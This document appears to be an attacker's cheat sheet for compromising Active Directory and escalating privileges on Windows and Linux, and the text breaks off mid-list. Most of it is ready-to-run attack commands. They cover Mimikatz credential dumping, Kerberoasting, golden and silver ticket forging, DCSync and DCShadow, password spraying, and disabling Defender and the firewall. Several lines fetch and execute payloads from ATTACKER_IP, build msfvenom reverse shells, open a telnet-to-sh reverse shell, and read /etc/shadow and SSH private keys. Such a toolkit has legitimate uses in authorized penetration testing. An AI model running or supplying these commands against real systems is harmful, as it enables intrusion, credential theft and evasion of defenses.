ACTIVE DIRECTORY: TOOLS that attackers use to penetrate and compromise Active Directory include: Described as “a little tool to play with Windows security”, Mimikatz is probably the most widely used AD exploitation tool and the most versatile. It provides a variety of methods for grabbing LM Hashes, Kerberos tickets, etc. PowerSploit is a PowerShell-based toolkit for recon, exfiltration, persistence, etc. Bloodhound is a graphical tool for finding relationships in AD environments that help speed the path to privileged access. Death Star shows how you can use information collected from Bloodhound and other tools to automate the elevation to Domain Admin (or similar). Service Principal Names (SPNs): Service accounts leverage SPNs to support Kerberos authentication, which leaves a trail to exactly where these accounts are and what they are used for. This information can be easily exploited by an attacker. Using PowerShell list all domain service accounts that have registered SPN values: #Build LDAP Filter to look for users with SPN values registered for current domain $ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))" $domain = New-Object System.DirectoryServices.DirectoryEntry $search = New-Object System.DirectoryServices.DirectorySearcher $search.SearchRoot = $domain $search.PageSize = 1000 $search.Filter = $ldapFilter $search.SearchScope = "Subtree" #Execute Search $results = $search.FindAll() #Display SPN values from the returned objects foreach ($result in $results) { $userEntry = $result.GetDirectoryEntry() Write-Host "User Name = " $userEntry.name foreach ($SPN in $userEntry.servicePrincipalName) { Write-Host "SPN = " $SPN } Write-Host "" } LOCATE ALL ACCOUNTS WITH "svc" IN THE NAME: #Build LDAP Filter to look for users with service account naming conventions $ldapFilter = "(&(objectclass=Person)(cn=*svc*))" $domain = New-Object System.DirectoryServices.DirectoryEntry $search = New-Object System.DirectoryServices.DirectorySearcher $search.SearchRoot = $domain $search.PageSize = 1000 $search.Filter = $ldapFilter $search.SearchScope = "Subtree" #Adds list of properties to search for $objProperties = "name" Foreach ($i in $objProperties){$search.PropertiesToLoad.Add($i)} #Execute Search $results = $search.FindAll() #Display values from the returned objects foreach ($result in $results) { $userEntry = $result.GetDirectoryEntry() Write-Host "User Name = " $userEntry.name Write-Host "" } To search Active Directory for service accounts, you need to investigate the values of an object’s user account control settings. Switch the first line of the above script with the line below to accomplish this. $ldapFilter = "(&(objectclass=user)(objectcategory=user)(useraccountcontrol :1.2.840.113556.1.4.803:=65536))" The data is structured in a tree format. Each node in the tree is called a key. Each key can contain both subkeys and data entries called values. Registry Hive - A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started or a user logs in. Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user’s hive contains specific registry information pertaining to the user’s application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. Most of the supporting files for the hives are in the %SystemRoot%\System32\Config directory. These files are updated each time a user logs on. Elevation of Privileges General # PowerShellMafia # Use always dev branch others are shit. https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 powershell.exe -c “Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks” powershell.exe -c “Import-Module C:\Users\Public\Get-System.ps1; Get-System” # Sherlock https://github.com/rasta-mouse/Sherlock # Unquoted paths wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\\” |findstr /i /v Kerberoast Simple logic for kerberoast is requesting tickets and cracking them(offline, doesn’t produce any logs) – For kerberos to work, times have to be within 5 minutes between attacker and victim. # Rubeus .\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 # List available tickets setspn.exe -t evil.corp -q */* powershell.exe -exec bypass -c “Import-Module .\GetUserSPNs.ps1” cscript.exe GetUserSPNs.ps1 # List cached tickets Invoke-Mimikatz -Command ‘”kerberos::list”‘ powershell.exe -c “klist” powershell.exe -c “Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command ‘”kerberos::list”‘” # Request tickets Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “HTTP/web01.medin.local” # Requesting remotely python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1 # Extract tickets powershell.exe -c “Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat” Invoke-Mimikatz -Command ‘”kerberos::list /export”‘ # Crack Tickets python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi Juicy Potato https://github.com/ohpe/juicy-potato/releases Pick one CLSID from here according to your system https://github.com/ohpe/juicy-potato/tree/master/CLSID Required tokens :- SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a “/c whoami > C:\Users\Public\morph3.txt” -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34} Stored Credential # To check if there is any stored keyscmdkey /list # Using them runas /user:administrator /savecred “cmd.exe /k whoami” Impersonating Tokens with meterpreter use incognito list_tokens -u impersonate_token NT-AUTHORITY\System Lateral Movement PsExec, SmbExec, WMIExec, RDP, PTH in general. WinRM is always good. Check groups carefully. Since windows gave support to OpenSSH we should also consider SSH. Mimikatz Ticket PTH Enable-PSRemoting mimikatz.exe ‘” kerberos:ptt C:\Users\Public\ticketname.kirbi”‘ “exit” Enter-PSSession -ComputerName ECORP WinRM $pass = ConvertTo-SecureString ‘supersecurepassword’ -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential (‘ECORP.local\morph3’, $pass) Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami } # Evil-WinRM https://github.com/Hackplayers/evil-winrm ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp PTH with Mimikatz Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command”‘ Database Links # PowerUpSQL https://github.com/NetSPI/PowerUpSQL Get-SQLServerLink -Instance server -Verbose powershell.exe -c “Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql” # To see servers select srvname from master..sysservers; # Native Get-SQLServerLinkCrawl -Instance server -Query “exec master..xp_cmdshell ‘whoami'” # Linked database tables select * from openquery(“ECORP\FOO”, ‘select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES’) # You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler # With meterpreter module you can find linked databases and if you are admin on them # You can do a query and try to enable xp_cmpshell on that server select * from openquery(“server”,’select * from master..sysservers’) EXECUTE AS USER = ‘internal_user’ (‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “server” Golden and Silver Tickets Keys depend of ticket : –> for a Golden, they are from the krbtgt account; –> for a Silver, it comes from the “computer account” or “service account”. # Golden Ticket # Extract the hash of the krbtgt user lsadump::dcsync /domain:evil.corp /user:krbtgt lsadump::lsa /inject lsadump:::lsa /patch lsadump::trust /patch # creating the ticket # /rc4 or /krbtgt – the NTLM hash # /sid you will get this from krbtgt dump # /ticket parameter is optional but default is ticket.kirbi # /groups parameter is optional but default is 513,512,520,518,519 # /id you can fake users and supply valid Administrator id kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 kerberos::ptt golden.tck # you can also add /ptt at the kerberos::golden command # After this , final ticket must be ready # You can now verify that your ticket is in your cache powershell.exe -c “klist” # Verify that golden ticket is working dir \\DC\C$ psexec.exe \\DC cmd.exe # Purge the currently cached kerberos ticket kerberos::purge #metasploit module can also be used for golden ticket, it loads the ticket into given session post/windows/escalate/golden_ticket # Silver Ticket # Silver Ticket allows escalation of privileges on DC # /target t he server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, …) # /service – The service name for the ticket (ex: cifs, rpcss, http, mssql, …) # Examples kerberos::golden /user:morph3 /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local.1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103 sqlcmd -S evilcorp-sql102.evilcorp.local select SYSTEM_USER; GO kerberos::golden /user:JohnDoe /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt AD Attacks Enumeration # Basic ldap enumeration enum4linux -a 192.168.1.2 python windapsearch.py -u morph3 -p morph3 -d evil.corp –dc-ip 192.168.1.2 python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd Bruteforce on ldap # Password spray https://github.com/dafthack/DomainPasswordSpray Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt # Password brute ./kerbrute_linux_amd64 bruteuser -d evil.corp –dc 192.168.1.2 rockyou.txt morph3 # Username brute ./kerbrute_linux_amd64 userenum -d evil.corp –dc 192.168.1.2 users.txt # Password spray ./kerbrute_linux_amd64 passwordspray -d evil.corp –dc 192.168.1.2 users.txt rockyou.txt DC Shadow AD MEM DC Shadow attack aims to inject malicious Domain Controllers into AD infrastructure so that we can dump actual AD members. #Find sid for that user wmic useraccount where (name=’administrator’ and domain=’%userdomain%’) get name,sid #This will create a RPC Server and listen lsadump::dcshadow /object:”CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local” /attribute:sidhistory /value:sid # Run this from another mimikatz lsadump::dcshadow /push # After this unregistration must be done # Relogin lsadump::dcsync /domain:ECORP.local /account:krbtgt # Now you must have krbtgt hash https://attack.stealthbits.com/how-dcshadow-persistence-attack-works/ DC Sync ##### lsadump::dcsync /domain:domain /all /csv lsadump::dcsync /user:krbtgt ##### https://gist.github.com/monoxgas/9d238accd969550136db powershell.exe -c “Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat” ##### python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL Bypass-Evasion Techniques Powershell Constrained Language Bypass powershell.exe -v 2 -ep bypass -command “IEX (New-Object Net.WebClient).DownloadString(‘http://ATTACKER_IP/rev.ps1’) PSByPassCLM powershell.exe -exec bypass -c Windows Defender sc config WinDefend start= disabled sc stop WinDefend # Powershell Set-MpPreference -DisableRealtimeMonitoring $true # Remove definitions “%Program Files%\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All Firewall Netsh Advfirewall show allprofiles NetSh Advfirewall set allprofiles state off Ip Whitelisting New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP Applocker ByPass https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md # Multistep process to bypass applocker via MSBuild.exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i > out.cs # Replace the buf-sc and save it as out.csproj https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml Invoke-WebRequest “http://ATTACKER_IP/payload.csproj” -OutFile “out.csproj”; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj # or you can simply use my tool 🙂 https://github.com/morph3/Msbuild-payload-generator sudo python msbuild_gen.py -a x86 -i 10 –lhost 192.168.220.130 –lport 9001 -m GreatSCT # This also needs Veil-Framework python GreatSCT.py –ip 192.168.1.56 –port 443 -t Bypass -p installutil/powershell/script.py -c “OBFUSCATION=ascii SCRIPT=/root/script.ps1” C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe python3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp –ip 192.168.1.56 –port 9001 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll EvilSalsa #Preparing payloads python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt #Executing payload SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001 # Reverse icmp shell python icmpsh_m.py “ATTACKER_IP” “VICTIM_IP” SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP Miscellaneous Changing Permissions of a file icacls text.txt /grant Everyone:F Downloading files IEX (New-Object System.Net.WebClient).DownloadString(“http://ATTACKER_IP/rev.ps1”) (New-Object System.Net.WebClient).DownloadFile(“http://ATTACKER_SERVER/malware.exe”, “C:\Windows\Temp\malware.exe”) Invoke-WebRequest “http://ATTACKER_SERVER/malware.exe” -OutFile “C:\Windows\Temp\malware.exe” certutil.exe -urlcache -split -f “http://127.0.0.1:80/shell.exe” shell.exe Adding user to Domain admins Add-DomainGroupMember -Identity ‘Domain Admins’ -Members morph3 -Verbose Base64 Encode-Decode certutil -decode foo.b64 foo.exe certutil -encode foo.exe foo.b64 Network sharing # Local share net share wmic share get /format:list # Remote share net view net view \\dc.ecorp.foo /all wmic /node: dc.ecorp.foo share get # Mounting share net use Z: \\127.0.0.1\C$ /user:morph3 password123 Port Forwarding # Port forward using plink plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080 # Port forward using meterpreter portfwd add -l attacker-port -p victim-port -r victim-ip portfwd add -l 3306 -p 3306 -r 192.168.1.56 Powershell Portscan 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) “Port $_ is open!”} 2>$null Recovering Powershell Secure String ###### $user = “morph3” $file = “morph3-pass.xml” $cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString) Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami } ###### [System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR(“string”)) ###### $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password) $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr) [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) $result Injecting PowerShell scripts Into sessions Invoke-Command -FilePath scriptname -Sessions $sessions Enter-PSSession -Session $sess Enable RDP # CMD reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f # Powershell Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’-name “fDenyTSConnections” -Value 0 Enable-NetFirewallRule -DisplayGroup “Remote Desktop” # Optional net localgroup “Remote Desktop Users” morph3 /add # Reruling firewall netsh advfirewall firewall set rule group=”remote desktop” new enable=Yes netsh advfirewall firewall add rule name=”allow RemoteDesktop” dir=in protocol=TCP localport=3389 action=allow Decrypting EFS files with Mimikatz Follow the link here How to Decrypt EFS Files privilege::debug token::elevate crypto::system /file:”C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert” /export dpapi::capi /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id” # Clear text password dpapi::masterkey /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey” /password:pass123 # After this command you must have the exported .der and .pvk files dpapi::capi /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id” /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b openssl x509 -inform DER -outform PEM -in blah.der -out public.pem openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out cert.pfx # Import the certificate certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot type “C:\Users\Administrator\Documents\encrypted.txt” Post exploitation – information gathering Reading Event Logs User must be in “Event Log Reader” group Follow this link Get-WinEvent -ListLog * # Listing logs of a specific user $cred = Get-Credentials Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred # Reading Security logs (Get-WinEvent -FilterHashtable @{LogName = ‘Security’} | Select-Object @{name=’NewProcessNam e’;expression={ $_.Properties[5].Value }}, @{name=’CommandLine’;expression={ $_.Properties[8].Value }}).commandline Password Dump # Metasploit post/windows/gather/enum_chrome post/multi/gather/firefox_creds post/firefox/gather/cookies post/firefox/gather/passwords post/windows/gather/forensics/browser_history post/windows/gather/enum_putty_saved_sessions # Empire collection/ChromeDump collection/FoxDump collection/netripper credentials/sessiongopher # mimikatz privilege::debug sekurlsa::logonpasswords Shadow copy There might be a case where you are privileged but can’t read-access to shadow files(NTDS.dit, SYSTEM etc.) diskshadow.exe set context persistent nowriters add volume C: alias morph3 create expose %morph3% Z: # Deletion delete shadows volume %morph3% reset NTDS.dit dump secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local python crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com –ntds drsuapi # on DC, lsass.exe can dump hashes lsadump::lsa /inject Summary of tools Ad Environment icebreaker bloodhound Post Exploitation Empire DeathStar CrackMapExec – CME Covenant Rubeus SharpDPAPI Bypass Ebowla Veil-Framework PsBypassCLM Swiss Knife impacket Windows Kernel Vulnerabilities in the Windows kernel are published from time to time of which many can be used to escalate privileges. The following command can be used to retrieve installed patches and their date: wmic qfe get Caption,Description,HotFixID,InstalledOn Wmic can be used to retrieve installed software and their versions: wmic product get name, version To search for missing DLLs, PowerSploit can be used with the following script: Find-ProcessDLLHijack Hereafter, we can check the permissions in the directories that Windows searches for DLL files: Find-PathDLLHijack In the last step we can create a malicious DLL file with the following script: Write-HijackDll Windows first tries to execute an executable file in the location where the first space is. E.g. the service path C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe when administrators want to deploy images on a large number of devices without user interaction (called unattended installations) they use the Windows Deployment Services. However, this requires that the local system administrator’s password or other, privileged account passwords are stored in one or more of the following locations: C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml As an example, the following CMD commands can be used to search for passwords in configuration files: findstr /si password password *.txt findstr /si password password *.xml findstr /si password password *.ini findstr /si password password *.dat Furthermore, the following PowerSploit scripts can be used: Get-UnattendedInstallFile Get-Webconfig Get-ApplicationHost Get-SiteListPassword Get-CachedGPPPassword The following commands are used to search for passwords in the registry: reg query HKLM /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s reg query HKU /f password /t REG_SZ /s reg query HKU /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s Insufficient Physical Access Manipulation Protection Further privilege escalation attack vectors exist if physical access to the target system is available. This section describes how privileges can be escalated on a system, which an attacker has physical access to and which is protected insufficiently against file manipulation. The following graph depicts the possibilities to elevate privileges by attacking devices which we have physical access to: Find All Servers where Domain Admins are Registered to Run Services. If we are using the Domain User or local system from a particular Domain computer use the following command Get-SPN -type group -search "Domain Admins" -List yes | Format-Table -Autosize for a non domain system with domain credentials we can use the command below Get-SPN -type group -search "Domain Admins" -List yes -DomainController 192.168.1.100 -Credential domainuser | Format-Table -Autosize Discovering the Service Accounts By Doing an SPN Scan for user accounts with Service Principal Names the service Accounts and the server accounts used can be identified. PS C:\> get-aduser -filter {ServicePrincipalName -like “*”} -Properties PasswordLastSet,LastLogonDate,ServicePrincipalName,TrustedForDelegation,TrustedtoAuthForDelegation Winexe Linux Binary pth-winexe Example with pth: pth-winexe -U ./Administrator%aad3b435b51404eeaad3b435b51404ee:4b579a266f697c2xxxxxxxxx //10.145.X.X cmd.exe pth-winexe -U EXAMPLE/Administrator%example@123 //10.145.X.X cmd.exe If we want to login as NTAuthority, probably use –system R-service: If there are any r-services enabled these are what you should try out, you may be lucky and get logged indirectly. #rlogin -l root // will directly log you in You can try an rlogin brute using Nmap script #nmap -p53 –script rlogin-brute #rusers -al #rwho SMB enumeration: This is what you might come across pretty often. #enum4linux -a //performs all basic enumeration using smb null session. #enum4linux -U 192.168.1.2 //-U will get userlist SMB null session is an unauthenticated netbios session between two computers. SMB null session is available for SMB1 systems only i.e 2000,xp,2003 To use an smb null session : #rpcclient -U “” 192.168.1.2 ///when asked enter empty password #rpcclient $>srvinfo #rpcclient $>enumdomusers #rpcclient $>querydominfo #rpcclient $>getdompwinfo //password policy #rpcclient $>netshareenum #nmblookup -A 192.168.1.1 #rpcinfo -p Enumerate using smbclinet: #smbclient -L //192.168.1.2 #smbclient -L //192.168.1.2/myshare -U anonymous #smb> get data.txt #smb>put evil.txt Brute SMB password: #nmap -p445 –script=smb-brute.nse Brute force should always be your last option. You can also use hydra to do it. Using nmap: #nmap -sU -sS –script=smb-enum-users -p U:137,T:139 192.168.1.200-254 #nmap -T4 -v -oA shares –script smb-enum-shares –script-args smbuser=username,smbpass=password -p445 192.168.1.0/24 Windows null session: C:\>net use \\TARGET\IPC$ “” /u:”” Use acccheck for getting user pass using smb #acccheck -v -t 192.168.1.2 -u -P /usr/share/dirb/wordlist/common.txt #acccheck -t 192.168.1.2 -U /root/users.txt -P /root/Pass.txt Once you got user creds we will use the creds to see the shares using smbmap #smbmap -u -p -d -H #smbmap -u user -p pass -d workgroup -H 192.168.1.2 #smbmap -L -u user -p pass -d workgroup -H 192.168.1.2 If you have only read privilege read the shares #smbmap -r -u user -p pass -d workgroup -H 192.168.1.2 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs Exploiting a vulnerable machine via dirtycow $ whoami – tells us the current user is john (non-root user) $ uname -a – gives us the kernel version which we know is vulnerable to dirtycow > downloaded the dirtycow exploit from here – https://www.exploit-db.com/exploits/40839/ > Compiled and executed it. It replaces the ‘root’ user with a new user ‘rash’ by editing the /etc/passwd file. $ su rash – It changes the current logged in user to ‘rash’ which is root. Exploiting vulnerable SUID executable to get root access $ find / -perm -u=s -type f 2>/dev/null – It prints the executables which have SUID bit set ls -la /usr/local/bin/nmap – Let’s confirm if nmap has SUID bit set or not. Exploiting misconfigured SUDO rights to get root access $ sudo -l – Prints the commands which we are allowed to run as SUDO sudo find /home -exec sh -i \; – find command’s exec parameter can be used for arbitrary code execution. Exploiting badly configured cron jobs to get root access $ ls -la /etc/cron.d – prints cron jobs which are already present in cron.d $ find / -perm -2 -type f 2>/dev/null – prints world writable files $ ls -la /usr/local/sbin/cron-logrotate.sh – Let’s confirm if the cron-logrotate.sh is world writable. $ echo “chown root:root /tmp/rootme; chmod u+s /tmp/rootme;”>/usr/local/sbin/cron-logrotate.sh – This will change the executable’s owner and group as root. It will also set the SUID bit. $ ls -la rootme – After 5 minutes, the logrotate cronjob was run and cron-logrotate.sh got execute with root privilege. $ ./rootme – spawns a root shell. > Now, if a root user executes the code with root privilege, we can achieve arbitrary code execution with root privilege. $ ls – executed ./ls file instead of running list command. Operating System What's the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based What's the kernel version? Is it 64-bit cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- What can be learnt from the environmental variables? cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set Is there a printer? lpstat -a Applications & Services What services are running? Which service has which user privilege? ps aux ps -ef top cat /etc/services Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! ps aux | grep root ps -ef | grep root What applications are installed? What version are they? Are they currently running? ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/ Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ What jobs are scheduled? crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root Any plain text usernames and/or passwords? grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla Communications & Networking What NIC(s) does the system have? Is it connected to another network? /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname What other users & hosts are communicating with the system? lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on Whats cached? IP and/or MAC addresses arp -e route /sbin/route -nee Is packet sniffing possible? What can be seen? Listen to live traffic tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21 Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] Have you got a shell? Can you interact with the system? nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ Is port forwarding possible? Redirect and interact with traffic from another view Note: http://www.boutell.com/rinetd/ Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe # Port Relay mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) Is tunnelling possible? Send commands locally, remotely ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig Confidential Information & Users Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? id who w last cat /etc/passwd | cut -d: -f1 # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/ Anything "interesting" in the home directorie(s)? If it's possible to access ls -ahlR /root/ ls -ahlR /home/ Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg What has the user being doing? Is there any password in plain text? What have they been edting? cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history What user information can be found? cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root Can private-key information be found? cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key File Systems Which configuration files can be written in /etc/? Able to reconfigure a service? ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone What can be found in /var/ ? ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases Any settings/files (hidden) on website? Any settings file with database information? ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/ Is there anything in the log file(s) (Could help with "Local File Includes"!) cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat 